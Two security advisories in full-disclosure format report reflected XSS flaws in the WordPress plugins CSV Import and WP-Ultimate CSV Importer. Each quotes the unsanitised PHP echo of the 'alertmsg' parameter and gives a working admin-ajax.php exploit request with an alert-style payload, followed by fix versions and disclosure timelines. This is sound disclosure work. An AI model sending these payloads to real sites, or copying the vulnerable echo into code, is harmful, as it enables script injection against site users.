CSV Import XSS Vulnerability

## FULL DISCLOSURE

#Product : CSV Import
#Exploit Author : Rahul Pratap Singh
#Version : 1.0
#Home page Link : https://wordpress.org/plugins/csv-import/
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 23/Feb/2016

XSS Vulnerability:

—————————————-
Description:
—————————————-
“alertmsg” parameter is not sanitized that leads to Reflected XSS.

—————————————-
Vulnerable Code:
—————————————-
File Name: csv-import/index.php

Found at line:238

echo __($_POST[‘alertmsg’], ‘csv-import’);

—————————————-
Exploit:
—————————————-
POST /wp-admin/admin-ajax.php

action=trans_csvimp_alertstr&alertmsg=”><img src=x onerror=alert(1)>

—————————————-
POC:
—————————————-
csv-importxsspoc

Fix:
Update to 1.1

Vulnerability Disclosure Timeline:
→ January   30, 2016  – Bug discovered, initial report to WordPress
→ February 1, 2016    – WordPress response, plugin taken down
→ February 23, 2016  – Vendor Deployed a Patch

#######################################
#                    CTG SECURITY SOLUTIONS                          #
#                www.ctgsecuritysolutions.com                        #
#######################################

Pub Ref:
https://wordpress.org/plugins/csv-import/changelog/

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

WP-Ultimate CSV Importer XSS Vulnerability

## FULL DISCLOSURE

#Product : WP-Ultimate CSV Importer
#Exploit Author : Rahul Pratap Singh
#Version : 3.8.6
#Home page Link : https://wordpress.org/plugins/wp-ultimate-csv-importer
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 27/Jan/2016

XSS Vulnerability:

—————————————-
Description:
—————————————-
“alertmsg” parameter is not sanitized that leads to reflected XSS.

—————————————-
Vulnerable Code:
—————————————-
File Name: /wp-ultimate-csv-importer/index.php

Found at line:256
echo __($_POST[‘alertmsg’],’wp-ultimate-csv-importer’);

—————————————-
Exploit:
—————————————-
POST /wp-admin/admin-ajax.php

action=trans_alert_str&alertmsg=<input+type%3Dtext+onclick%3Dalert(%2FXSS%2F)>

—————————————-
POC:
—————————————-
wp-ultimate-csv-importerxsspoc

Fix:
Update to 3.8.8

Vulnerability Disclosure Timeline:
→ January 14, 2015  – Bug discovered, initial report to Vendor
→ January 14, 2015  – Vendor acknowledged and scheduled a fix
→ January 18, 2015  – Reported to wordpress
→ January 19, 2015  – WordPress Response, plugin taken down
→ January 26, 2015  – Vendor Deployed a Patch

#######################################
#                    CTG SECURITY SOLUTIONS                          #
#                www.ctgsecuritysolutions.com                        #
#######################################

Pub Ref:
https://wordpress.org/plugins/wp-ultimate-csv-importer/changelog/

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.